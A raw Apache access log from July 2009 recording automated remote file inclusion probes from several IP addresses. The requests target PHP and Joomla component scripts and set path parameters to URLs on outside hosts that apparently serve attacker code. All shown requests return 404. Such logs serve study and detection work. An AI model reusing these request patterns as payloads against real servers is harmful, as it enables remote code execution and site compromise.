67.15.177.55 - - [20/Jul/2009:04:22:44 -0400] "GET /logs/access_log.Q109053100%20%20//citywriter/head.php?path=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:04:22:44 -0400] "GET //citywriter/head.php?path=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:04:22:47 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.193.229.157 - - [20/Jul/2009:04:23:00 -0400] "GET /logs/access_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:23:00 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:23:01 -0400] "GET /logs/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:23:13 -0400] "GET /logs/access_log.Q109061400/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:23:13 -0400] "GET /logs/access_log.Q109061400/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:23:13 -0400] "GET /index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:23:13 -0400] "GET /index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:23:14 -0400] "GET /logs/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:23:14 -0400] "GET /logs/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
74.63.91.170 - - [20/Jul/2009:04:23:16 -0400] "GET /logs/access_log.Q109051200%20%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:04:23:17 -0400] "GET /logs/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.61 [en] (OS/2; U)"
